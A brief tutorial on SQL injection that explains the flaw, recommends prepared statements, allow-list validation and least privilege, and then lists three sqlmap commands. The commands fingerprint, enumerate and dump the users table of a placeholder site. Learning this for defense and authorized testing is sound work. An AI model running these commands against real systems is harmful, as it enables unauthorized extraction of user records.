SQL Injection & SQLmap Mastery Guide

What is SQL Injection (SQLi)?

SQL Injection is a vulnerability where an application improperly handles user input in a database query. By injecting malicious SQL code, an attacker can manipulate the query's structure to bypass authentication or extract sensitive data.

Solutions & Prevention

Parameterized Queries (Prepared Statements): The most effective defense. It forces the database to treat inputs as literal data, never as executable code.
Input Validation: Implement strict allow-lists for user input.
Principle of Least Privilege: Ensure database accounts have only the permissions strictly necessary for their function.

// Secure PHP Example
$stmt = $pdo->prepare('SELECT * FROM users WHERE id = ?');
$stmt->execute([$id]);

Step 1: Identification & Fingerprinting

sqlmap -u "http://target-site.com/view.php?id=10" --batch --banner

Step 2: Database Enumeration

sqlmap -u "http://target-site.com/view.php?id=10" --dbs --batch

Step 3: Data Extraction

sqlmap -u "http://target-site.com/view.php?id=10" -D app -T users --dump --batch